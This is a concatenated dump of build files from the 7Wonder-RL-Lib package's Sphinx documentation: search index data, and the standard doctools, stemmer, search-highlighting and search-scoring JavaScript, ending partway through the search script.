unittest.main() | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/Test/allTests.py | allTests.py |
Search.setIndex({"docnames": ["index"], "filenames": ["index.rst"], "titles": ["Welcome to 7Wonder-RL-Lib\u2019s documentation!"], "terms": {"index": 0, "modul": 0, "search": 0, "page": 0, "master": [], "file": [], "creat": [], "sphinx": [], "quickstart": [], "wed": [], "mai": [], "10": [], "21": [], "53": [], "31": [], "2023": [], "you": [], "can": 0, "adapt": [], "thi": 0, "complet": [], "your": 0, "like": [], "should": 0, "least": [], "contain": 0, "root": [], "toctre": [], "direct": [], "maxdepth": [], "2": 0, "caption": [], "content": [], "class": 0, "sevenwonenv": 0, "env": 0, "sevenwonderenv": 0, "player": 0, "close": 0, "after": 0, "user": 0, "ha": 0, "finish": 0, "us": 0, "environ": 0, "code": 0, "necessari": 0, "clean": 0, "up": 0, "i": 0, "critic": 0, "render": 0, "window": 0, "databas": 0, "http": 0, "connect": 0, "legalact": 0, "playernum": 0, "given": 0, "number": 0, "return": 0, "all": 0, "legal": 0, "action": 0, "list": 0, "param": [], "int": [], "mode": 0, "human": 0, "comput": 0, "frame": 0, "specifi": 0, "render_mod": 0, "dure": 0, "initi": 0, "The": 0, "metadata": 0, "possibl": 0, "wai": 0, "implement": 0, "In": 0, "addit": 0, "version": 0, "most": 0, "achiev": 0, "through": 0, "gymnasium": 0, "make": 0, "which": 0, "automat": 0, "appli": 0, "wrapper": 0, "collect": 0, "note": 0, "As": 0, "known": 0, "__init__": 0, "object": 0, "state": 0, "initialis": 0, "By": 0, "convent": 0, "none": 0, "default": 0, "continu": 0, "current": 0, "displai": 0, "termin": 0, "usual": 0, "consumpt": 0, "occur": 0, "step": 0, "doesn": 0, "t": 0, "need": 0, "call": 0, "rgb_arrai": 0, "singl": 0, "repres": 0, "A": 0, "np": 0, "ndarrai": 0, "shape": 0, "x": 0, "y": 0, "3": 0, "rgb": 0, "valu": 0, "an": 0, "pixel": 0, "imag": 0, "ansi": 0, "string": 0, "str": 0, "stringio": 0, "style": 0, "text": 0, "represent": 0, "each": 0, "time": 0, "includ": 0, "newlin": 0, "escap": 0, "sequenc": 0, "e": 0, "g": 0, "color": 0, "rgb_array_list": 0, "ansi_list": 0, "base": 0, "ar": 0, "except": 0, "rendercollect": 0, "pop": 0, "reset": 0, "sure": 0, "kei": 0, "support": 0, "chang": 0, "0": 0, "25": 0, "function": 0, "wa": 0, "longer": 0, "accept": 0, "paramet": 0, "rather": 0, "cartpol": 0, "v1": 0, "seed": 0, "option": 0, "episod": 0, "setperson": 0, "personalitylist": 0, "set": 0, "person": 0, "proce": 0, "one": 0, "turn": 0, "game": 0, "tupl": 0, "posit": 0, "1": 0, "n": 0, "arg": 0, "actioncod": 0, "id": 0, "random": 0, "new_stat": 0, "reward": 0, "done": 0, "info": 0, "librari": 0, "provid": 0, "test": 0, "reinforc": 0, "learn": 0, "7": 0, "wonder": 0, "There": 0, "multipl": 0, "ai": 0, "howev": 0, "now": 0, "mostli": 0, "cover": 0, "onli": 0, "tradit": 0, "board": 0, "go": 0, "chess": 0, "etc": 0, "52": 0, "card": 0, "poker": 0, "rummi": 0, "where": 0, "do": 0, "realli": 0, "have": 0, "interact": 0, "other": 0, "euro": 0, "good": 0, "algorithm": 0, "mani": 0, "aspect": 0, "explor": 0, "trade": 0, "deal": 0, "imperfect": 0, "inform": 0, "stochast": 0, "element": 0, "introduc": 0, "mention": 0, "abov": 0, "out": 0, "new": 0, "basic": 0, "system": 0, "allow": 0, "custom": 0, "space": 0, "To": 0, "gym": 0, "run": 0, "pip": [], "sevenwondersenv": 0, "exampl": 0, "how": 0, "declar": 0, "below": 0, "import": 0, "from": 0, "maingameenv": 0, "4": 0, "randomai": 0, "rulebasedai": 0, "dqnai": 0, "append": 0, "rang": 0, "statelist": 0, "variabl": 0, "consist": 0, "depend": 0, "add": 0, "model": 0, "py": 0, "main": 0, "init": 0, "make_choic": 0, "For": 0, "take": 0, "choic": 0, "randomli": 0, "choos": 0, "def": 0, 
"self": 0, "super": 0, "ag": 0, "len": 0, "develop": 0, "build": 0}, "objects": {"SevenWonEnv.envs": [[0, 0, 0, "-", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv": [[0, 1, 1, "", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv": [[0, 2, 1, "", "close"], [0, 2, 1, "", "legalAction"], [0, 2, 1, "", "render"], [0, 2, 1, "", "reset"], [0, 2, 1, "", "setPersonality"], [0, 2, 1, "", "step"]]}, "objtypes": {"0": "py:module", "1": "py:class", "2": "py:method"}, "objnames": {"0": ["py", "module", "Python module"], "1": ["py", "class", "Python class"], "2": ["py", "method", "Python method"]}, "titleterms": {"welcom": 0, "7wonder": 0, "rl": 0, "lib": 0, "": 0, "document": 0, "indic": 0, "tabl": 0, "readm": 0, "file": 0, "overview": 0, "instal": 0, "usag": 0}, "envversion": {"sphinx.domains.c": 2, "sphinx.domains.changeset": 1, "sphinx.domains.citation": 1, "sphinx.domains.cpp": 8, "sphinx.domains.index": 1, "sphinx.domains.javascript": 2, "sphinx.domains.math": 2, "sphinx.domains.python": 3, "sphinx.domains.rst": 2, "sphinx.domains.std": 2, "sphinx": 57}, "alltitles": {"Welcome to 7Wonder-RL-Lib\u2019s documentation!": [[0, "welcome-to-7wonder-rl-lib-s-documentation"]], "Readme File": [[0, "readme-file"]], "7Wonder-RL-Lib": [[0, "wonder-rl-lib"]], "Overview": [[0, "overview"]], "Installation": [[0, "installation"]], "Usage": [[0, "usage"]], "Documentation": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "Indices and tables": [[0, "indices-and-tables"]]}, "indexentries": {"sevenwonenv.envs.sevenwonderenv": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "sevenwonderenv (class in sevenwonenv.envs.sevenwonderenv)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv"]], "close() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.close"]], "legalaction() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.legalAction"]], "module": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "render() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.render"]], "reset() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.reset"]], "setpersonality() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.setPersonality"]], "step() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.step"]]}}) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/searchindex.js | searchindex.js |
Search.setIndex({"docnames": ["index"], "filenames": ["index.rst"], "titles": ["Welcome to 7Wonder-RL-Lib\u2019s documentation!"], "terms": {"index": 0, "modul": 0, "search": 0, "page": 0, "master": [], "file": [], "creat": [], "sphinx": [], "quickstart": [], "wed": [], "mai": [], "10": [], "21": [], "53": [], "31": [], "2023": [], "you": [], "can": 0, "adapt": [], "thi": 0, "complet": [], "your": 0, "like": [], "should": 0, "least": [], "contain": 0, "root": [], "toctre": [], "direct": [], "maxdepth": [], "2": 0, "caption": [], "content": [], "class": 0, "sevenwonenv": 0, "env": 0, "sevenwonderenv": 0, "player": 0, "close": 0, "after": 0, "user": 0, "ha": 0, "finish": 0, "us": 0, "environ": 0, "code": 0, "necessari": 0, "clean": 0, "up": 0, "i": 0, "critic": 0, "render": 0, "window": 0, "databas": 0, "http": 0, "connect": 0, "legalact": 0, "playernum": 0, "given": 0, "number": 0, "return": 0, "all": 0, "legal": 0, "action": 0, "list": 0, "param": [], "int": [], "mode": 0, "human": 0, "comput": 0, "frame": 0, "specifi": 0, "render_mod": 0, "dure": 0, "initi": 0, "The": 0, "metadata": 0, "possibl": 0, "wai": 0, "implement": 0, "In": 0, "addit": 0, "version": 0, "most": 0, "achiev": 0, "through": 0, "gymnasium": 0, "make": 0, "which": 0, "automat": 0, "appli": 0, "wrapper": 0, "collect": 0, "note": 0, "As": 0, "known": 0, "__init__": 0, "object": 0, "state": 0, "initialis": 0, "By": 0, "convent": 0, "none": 0, "default": 0, "continu": 0, "current": 0, "displai": 0, "termin": 0, "usual": 0, "consumpt": 0, "occur": 0, "step": 0, "doesn": 0, "t": 0, "need": 0, "call": 0, "rgb_arrai": 0, "singl": 0, "repres": 0, "A": 0, "np": 0, "ndarrai": 0, "shape": 0, "x": 0, "y": 0, "3": 0, "rgb": 0, "valu": 0, "an": 0, "pixel": 0, "imag": 0, "ansi": 0, "string": 0, "str": 0, "stringio": 0, "style": 0, "text": 0, "represent": 0, "each": 0, "time": 0, "includ": 0, "newlin": 0, "escap": 0, "sequenc": 0, "e": 0, "g": 0, "color": 0, "rgb_array_list": 0, "ansi_list": 0, "base": 0, "ar": 0, "except": 0, "rendercollect": 0, "pop": 0, "reset": 0, "sure": 0, "kei": 0, "support": 0, "chang": 0, "0": 0, "25": 0, "function": 0, "wa": 0, "longer": 0, "accept": 0, "paramet": 0, "rather": 0, "cartpol": 0, "v1": 0, "seed": 0, "option": 0, "episod": 0, "setperson": 0, "personalitylist": 0, "set": 0, "person": 0, "proce": 0, "one": 0, "turn": 0, "game": 0, "tupl": 0, "posit": 0, "1": 0, "n": 0, "arg": 0, "actioncod": 0, "id": 0, "random": 0, "new_stat": 0, "reward": 0, "done": 0, "info": 0, "librari": 0, "provid": 0, "test": 0, "reinforc": 0, "learn": 0, "7": 0, "wonder": 0, "There": 0, "multipl": 0, "ai": 0, "howev": 0, "now": 0, "mostli": 0, "cover": 0, "onli": 0, "tradit": 0, "board": 0, "go": 0, "chess": 0, "etc": 0, "52": 0, "card": 0, "poker": 0, "rummi": 0, "where": 0, "do": 0, "realli": 0, "have": 0, "interact": 0, "other": 0, "euro": 0, "good": 0, "algorithm": 0, "mani": 0, "aspect": 0, "explor": 0, "trade": 0, "deal": 0, "imperfect": 0, "inform": 0, "stochast": 0, "element": 0, "introduc": 0, "mention": 0, "abov": 0, "out": 0, "new": 0, "basic": 0, "system": 0, "allow": 0, "custom": 0, "space": 0, "To": 0, "gym": 0, "run": 0, "pip": [], "sevenwondersenv": 0, "exampl": 0, "how": 0, "declar": 0, "below": 0, "import": 0, "from": 0, "maingameenv": 0, "4": 0, "randomai": 0, "rulebasedai": 0, "dqnai": 0, "append": 0, "rang": 0, "statelist": 0, "variabl": 0, "consist": 0, "depend": 0, "add": 0, "model": 0, "py": 0, "main": 0, "init": 0, "make_choic": 0, "For": 0, "take": 0, "choic": 0, "randomli": 0, "choos": 0, "def": 0, 
"self": 0, "super": 0, "ag": 0, "len": 0, "develop": 0, "build": 0}, "objects": {"SevenWonEnv.envs": [[0, 0, 0, "-", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv": [[0, 1, 1, "", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv": [[0, 2, 1, "", "close"], [0, 2, 1, "", "legalAction"], [0, 2, 1, "", "render"], [0, 2, 1, "", "reset"], [0, 2, 1, "", "setPersonality"], [0, 2, 1, "", "step"]]}, "objtypes": {"0": "py:module", "1": "py:class", "2": "py:method"}, "objnames": {"0": ["py", "module", "Python module"], "1": ["py", "class", "Python class"], "2": ["py", "method", "Python method"]}, "titleterms": {"welcom": 0, "7wonder": 0, "rl": 0, "lib": 0, "": 0, "document": 0, "indic": 0, "tabl": 0, "readm": 0, "file": 0, "overview": 0, "instal": 0, "usag": 0}, "envversion": {"sphinx.domains.c": 2, "sphinx.domains.changeset": 1, "sphinx.domains.citation": 1, "sphinx.domains.cpp": 8, "sphinx.domains.index": 1, "sphinx.domains.javascript": 2, "sphinx.domains.math": 2, "sphinx.domains.python": 3, "sphinx.domains.rst": 2, "sphinx.domains.std": 2, "sphinx": 57}, "alltitles": {"Welcome to 7Wonder-RL-Lib\u2019s documentation!": [[0, "welcome-to-7wonder-rl-lib-s-documentation"]], "Readme File": [[0, "readme-file"]], "7Wonder-RL-Lib": [[0, "wonder-rl-lib"]], "Overview": [[0, "overview"]], "Installation": [[0, "installation"]], "Usage": [[0, "usage"]], "Documentation": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "Indices and tables": [[0, "indices-and-tables"]]}, "indexentries": {"sevenwonenv.envs.sevenwonderenv": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "sevenwonderenv (class in sevenwonenv.envs.sevenwonderenv)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv"]], "close() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.close"]], "legalaction() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.legalAction"]], "module": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "render() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.render"]], "reset() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.reset"]], "setpersonality() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.setPersonality"]], "step() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.step"]]}}) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/searchindex.js | searchindex.js |
"use strict";
const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([
"TEXTAREA",
"INPUT",
"SELECT",
"BUTTON",
]);
const _ready = (callback) => {
if (document.readyState !== "loading") {
callback();
} else {
document.addEventListener("DOMContentLoaded", callback);
}
};
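// Illustrative usage (not part of the original file): run setup code once the
// DOM is ready; the callback fires immediately if parsing already finished.
//   _ready(() => console.log("documentation scripts initialised"));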
/**
* Small JavaScript module for the documentation.
*/
const Documentation = {
init: () => {
Documentation.initDomainIndexTable();
Documentation.initOnKeyListeners();
},
/**
* i18n support
*/
TRANSLATIONS: {},
PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),
LOCALE: "unknown",
// gettext and ngettext don't access this so that the functions
  // can safely be bound to a different name (_ = Documentation.gettext)
gettext: (string) => {
const translated = Documentation.TRANSLATIONS[string];
switch (typeof translated) {
case "undefined":
return string; // no translation
case "string":
return translated; // translation exists
default:
return translated[0]; // (singular, plural) translation tuple exists
}
},
ngettext: (singular, plural, n) => {
const translated = Documentation.TRANSLATIONS[singular];
if (typeof translated !== "undefined")
return translated[Documentation.PLURAL_EXPR(n)];
return n === 1 ? singular : plural;
},
addTranslations: (catalog) => {
Object.assign(Documentation.TRANSLATIONS, catalog.messages);
Documentation.PLURAL_EXPR = new Function(
"n",
`return (${catalog.plural_expr})`
);
Documentation.LOCALE = catalog.locale;
},
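  // Illustrative sketch (hypothetical catalog, not part of the original file):
  // Sphinx normally loads a generated translations.js that calls
  // addTranslations; wired up by hand it would look like
  //
  //   Documentation.addTranslations({
  //     messages: { "Hide Search Matches": "Suchtreffer ausblenden" },
  //     plural_expr: "n === 1 ? 0 : 1",
  //     locale: "de",
  //   });
  //   Documentation.gettext("Hide Search Matches");
  //   // -> "Suchtreffer ausblenden"; unknown strings fall through unchanged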
/**
* helper function to focus on search bar
*/
focusSearchBar: () => {
document.querySelectorAll("input[name=q]")[0]?.focus();
},
/**
* Initialise the domain index toggle buttons
*/
initDomainIndexTable: () => {
const toggler = (el) => {
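      // toggler images carry ids of the form "toggle-<n>" (substr(7) strips
      // the prefix) and control the index rows marked with class "cg-<n>"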
const idNumber = el.id.substr(7);
const toggledRows = document.querySelectorAll(`tr.cg-${idNumber}`);
if (el.src.substr(-9) === "minus.png") {
el.src = `${el.src.substr(0, el.src.length - 9)}plus.png`;
toggledRows.forEach((el) => (el.style.display = "none"));
} else {
el.src = `${el.src.substr(0, el.src.length - 8)}minus.png`;
toggledRows.forEach((el) => (el.style.display = ""));
}
};
const togglerElements = document.querySelectorAll("img.toggler");
togglerElements.forEach((el) =>
el.addEventListener("click", (event) => toggler(event.currentTarget))
);
togglerElements.forEach((el) => (el.style.display = ""));
if (DOCUMENTATION_OPTIONS.COLLAPSE_INDEX) togglerElements.forEach(toggler);
},
initOnKeyListeners: () => {
// only install a listener if it is really needed
if (
!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS &&
!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS
)
return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.altKey || event.ctrlKey || event.metaKey) return;
if (!event.shiftKey) {
switch (event.key) {
case "ArrowLeft":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const prevLink = document.querySelector('link[rel="prev"]');
if (prevLink && prevLink.href) {
window.location.href = prevLink.href;
event.preventDefault();
}
break;
case "ArrowRight":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const nextLink = document.querySelector('link[rel="next"]');
if (nextLink && nextLink.href) {
window.location.href = nextLink.href;
event.preventDefault();
}
break;
}
}
// some keyboard layouts may need Shift to get /
switch (event.key) {
case "/":
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) break;
Documentation.focusSearchBar();
event.preventDefault();
}
});
},
};
// quick alias for translations
const _ = Documentation.gettext;
_ready(Documentation.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/doctools.js | doctools.js |
var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];
/* A non-minified version is copied alongside as a separate JS file, if available. */
/**
* Porter Stemmer
*/
var Stemmer = function() {
var step2list = {
ational: 'ate',
tional: 'tion',
enci: 'ence',
anci: 'ance',
izer: 'ize',
bli: 'ble',
alli: 'al',
entli: 'ent',
eli: 'e',
ousli: 'ous',
ization: 'ize',
ation: 'ate',
ator: 'ate',
alism: 'al',
iveness: 'ive',
fulness: 'ful',
ousness: 'ous',
aliti: 'al',
iviti: 'ive',
biliti: 'ble',
logi: 'log'
};
var step3list = {
icate: 'ic',
ative: '',
alize: 'al',
iciti: 'ic',
ical: 'ic',
ful: '',
ness: ''
};
var c = "[^aeiou]"; // consonant
var v = "[aeiouy]"; // vowel
var C = c + "[^aeiouy]*"; // consonant sequence
var V = v + "[aeiou]*"; // vowel sequence
var mgr0 = "^(" + C + ")?" + V + C; // [C]VC... is m>0
var meq1 = "^(" + C + ")?" + V + C + "(" + V + ")?$"; // [C]VC[V] is m=1
var mgr1 = "^(" + C + ")?" + V + C + V + C; // [C]VCVC... is m>1
var s_v = "^(" + C + ")?" + v; // vowel in stem
this.stemWord = function (w) {
var stem;
var suffix;
var firstch;
var origword = w;
if (w.length < 3)
return w;
var re;
var re2;
var re3;
var re4;
firstch = w.substr(0,1);
if (firstch == "y")
w = firstch.toUpperCase() + w.substr(1);
// Step 1a
re = /^(.+?)(ss|i)es$/;
re2 = /^(.+?)([^s])s$/;
if (re.test(w))
w = w.replace(re,"$1$2");
else if (re2.test(w))
w = w.replace(re2,"$1$2");
// Step 1b
re = /^(.+?)eed$/;
re2 = /^(.+?)(ed|ing)$/;
if (re.test(w)) {
var fp = re.exec(w);
re = new RegExp(mgr0);
if (re.test(fp[1])) {
re = /.$/;
w = w.replace(re,"");
}
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1];
re2 = new RegExp(s_v);
if (re2.test(stem)) {
w = stem;
re2 = /(at|bl|iz)$/;
re3 = new RegExp("([^aeiouylsz])\\1$");
re4 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re2.test(w))
w = w + "e";
else if (re3.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
else if (re4.test(w))
w = w + "e";
}
}
// Step 1c
re = /^(.+?)y$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(s_v);
if (re.test(stem))
w = stem + "i";
}
// Step 2
re = /^(.+?)(ational|tional|enci|anci|izer|bli|alli|entli|eli|ousli|ization|ation|ator|alism|iveness|fulness|ousness|aliti|iviti|biliti|logi)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step2list[suffix];
}
// Step 3
re = /^(.+?)(icate|ative|alize|iciti|ical|ful|ness)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step3list[suffix];
}
// Step 4
re = /^(.+?)(al|ance|ence|er|ic|able|ible|ant|ement|ment|ent|ou|ism|ate|iti|ous|ive|ize)$/;
re2 = /^(.+?)(s|t)(ion)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
if (re.test(stem))
w = stem;
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1] + fp[2];
re2 = new RegExp(mgr1);
if (re2.test(stem))
w = stem;
}
// Step 5
re = /^(.+?)e$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
re2 = new RegExp(meq1);
re3 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re.test(stem) || (re2.test(stem) && !(re3.test(stem))))
w = stem;
}
re = /ll$/;
re2 = new RegExp(mgr1);
if (re.test(w) && re2.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
// and turn initial Y back to y
if (firstch == "y")
w = firstch.toLowerCase() + w.substr(1);
return w;
}
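  // Illustrative examples (classic Porter stemmer test cases, not part of
  // the original file):
  //   new Stemmer().stemWord("relational") -> "relat"
  //   new Stemmer().stemWord("running")    -> "run"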
} | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/language_data.js | language_data.js |
"use strict";
const SPHINX_HIGHLIGHT_ENABLED = true;
/**
* highlight a given string on a node by wrapping it in
* span elements with the given class name.
*/
const _highlight = (node, addItems, text, className) => {
if (node.nodeType === Node.TEXT_NODE) {
const val = node.nodeValue;
const parent = node.parentNode;
const pos = val.toLowerCase().indexOf(text);
if (
pos >= 0 &&
!parent.classList.contains(className) &&
!parent.classList.contains("nohighlight")
) {
let span;
const closestNode = parent.closest("body, svg, foreignObject");
const isInSVG = closestNode && closestNode.matches("svg");
if (isInSVG) {
span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");
} else {
span = document.createElement("span");
span.classList.add(className);
}
span.appendChild(document.createTextNode(val.substr(pos, text.length)));
parent.insertBefore(
span,
parent.insertBefore(
document.createTextNode(val.substr(pos + text.length)),
node.nextSibling
)
);
node.nodeValue = val.substr(0, pos);
if (isInSVG) {
const rect = document.createElementNS(
"http://www.w3.org/2000/svg",
"rect"
);
const bbox = parent.getBBox();
rect.x.baseVal.value = bbox.x;
rect.y.baseVal.value = bbox.y;
rect.width.baseVal.value = bbox.width;
rect.height.baseVal.value = bbox.height;
rect.setAttribute("class", className);
addItems.push({ parent: parent, target: rect });
}
}
} else if (node.matches && !node.matches("button, select, textarea")) {
node.childNodes.forEach((el) => _highlight(el, addItems, text, className));
}
};
const _highlightText = (thisNode, text, className) => {
let addItems = [];
_highlight(thisNode, addItems, text, className);
addItems.forEach((obj) =>
obj.parent.insertAdjacentElement("beforebegin", obj.target)
);
};
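// Illustrative usage (hypothetical call, not part of the original file):
//   _highlightText(document.body, "sphinx", "highlighted");
// wraps each case-insensitive occurrence of "sphinx" in a
// <span class="highlighted"> (or a <tspan> plus a backing <rect> inside SVG).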
/**
* Small JavaScript module for the documentation.
*/
const SphinxHighlight = {
/**
* highlight the search words provided in localstorage in the text
*/
highlightSearchWords: () => {
if (!SPHINX_HIGHLIGHT_ENABLED) return; // bail if no highlight
// get and clear terms from localstorage
const url = new URL(window.location);
const highlight =
localStorage.getItem("sphinx_highlight_terms")
|| url.searchParams.get("highlight")
|| "";
    localStorage.removeItem("sphinx_highlight_terms");
url.searchParams.delete("highlight");
window.history.replaceState({}, "", url);
// get individual terms from highlight string
const terms = highlight.toLowerCase().split(/\s+/).filter(x => x);
if (terms.length === 0) return; // nothing to do
// There should never be more than one element matching "div.body"
const divBody = document.querySelectorAll("div.body");
const body = divBody.length ? divBody[0] : document.querySelector("body");
window.setTimeout(() => {
terms.forEach((term) => _highlightText(body, term, "highlighted"));
}, 10);
const searchBox = document.getElementById("searchbox");
if (searchBox === null) return;
searchBox.appendChild(
document
.createRange()
.createContextualFragment(
'<p class="highlight-link">' +
'<a href="javascript:SphinxHighlight.hideSearchWords()">' +
_("Hide Search Matches") +
"</a></p>"
)
);
},
/**
* helper function to hide the search marks again
*/
hideSearchWords: () => {
document
.querySelectorAll("#searchbox .highlight-link")
.forEach((el) => el.remove());
document
.querySelectorAll("span.highlighted")
.forEach((el) => el.classList.remove("highlighted"));
    localStorage.removeItem("sphinx_highlight_terms");
},
initEscapeListener: () => {
// only install a listener if it is really needed
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.shiftKey || event.altKey || event.ctrlKey || event.metaKey) return;
if (DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS && (event.key === "Escape")) {
SphinxHighlight.hideSearchWords();
event.preventDefault();
}
});
},
};
_ready(SphinxHighlight.highlightSearchWords);
_ready(SphinxHighlight.initEscapeListener); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/sphinx_highlight.js | sphinx_highlight.js |
"use strict";
/**
* Simple result scoring code.
*/
if (typeof Scorer === "undefined") {
var Scorer = {
// Implement the following function to further tweak the score for each result
// The function takes a result array [docname, title, anchor, descr, score, filename]
// and returns the new score.
/*
score: result => {
const [docname, title, anchor, descr, score, filename] = result
return score
},
*/
// query matches the full name of an object
objNameMatch: 11,
// or matches in the last dotted part of the object name
objPartialMatch: 6,
// Additive scores depending on the priority of the object
objPrio: {
0: 15, // used to be importantResults
1: 5, // used to be objectResults
2: -5, // used to be unimportantResults
},
// Used when the priority is not in the mapping.
objPrioDefault: 0,
// query found in title
title: 15,
partialTitle: 7,
// query found in terms
term: 5,
partialTerm: 2,
};
}
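// Illustrative sketch (hypothetical hook, not part of the original file):
// query() below consults Scorer.score when it is set, so a theme can attach
// a custom re-scoring function after this script has loaded, e.g.
//
//   Scorer.score = ([docname, title, anchor, descr, score, filename]) =>
//     docname.startsWith("api/") ? score + 5 : score;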
const _removeChildren = (element) => {
while (element && element.lastChild) element.removeChild(element.lastChild);
};
/**
* See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#escaping
*/
const _escapeRegExp = (string) =>
string.replace(/[.*+\-?^${}()|[\]\\]/g, "\\$&"); // $& means the whole matched string
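// Example (illustrative): _escapeRegExp("c++ (lang)") -> "c\\+\\+ \\(lang\\)",
// a pattern that matches the input literally.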
const _displayItem = (item, searchTerms) => {
const docBuilder = DOCUMENTATION_OPTIONS.BUILDER;
const docUrlRoot = DOCUMENTATION_OPTIONS.URL_ROOT;
const docFileSuffix = DOCUMENTATION_OPTIONS.FILE_SUFFIX;
const docLinkSuffix = DOCUMENTATION_OPTIONS.LINK_SUFFIX;
const showSearchSummary = DOCUMENTATION_OPTIONS.SHOW_SEARCH_SUMMARY;
const [docName, title, anchor, descr, score, _filename] = item;
let listItem = document.createElement("li");
let requestUrl;
let linkUrl;
if (docBuilder === "dirhtml") {
// dirhtml builder
let dirname = docName + "/";
if (dirname.match(/\/index\/$/))
dirname = dirname.substring(0, dirname.length - 6);
else if (dirname === "index/") dirname = "";
requestUrl = docUrlRoot + dirname;
linkUrl = requestUrl;
} else {
// normal html builders
requestUrl = docUrlRoot + docName + docFileSuffix;
linkUrl = docName + docLinkSuffix;
}
let linkEl = listItem.appendChild(document.createElement("a"));
linkEl.href = linkUrl + anchor;
linkEl.dataset.score = score;
linkEl.innerHTML = title;
if (descr)
listItem.appendChild(document.createElement("span")).innerHTML =
" (" + descr + ")";
  else if (showSearchSummary)
    fetch(requestUrl)
      .then((responseData) => responseData.text())
      .then((data) => {
        if (!data) return;
        // makeSearchSummary may return null when no text could be extracted
        const summary = Search.makeSearchSummary(data, searchTerms);
        if (summary) listItem.appendChild(summary);
      });
Search.output.appendChild(listItem);
};
const _finishSearch = (resultCount) => {
Search.stopPulse();
Search.title.innerText = _("Search Results");
if (!resultCount)
Search.status.innerText = Documentation.gettext(
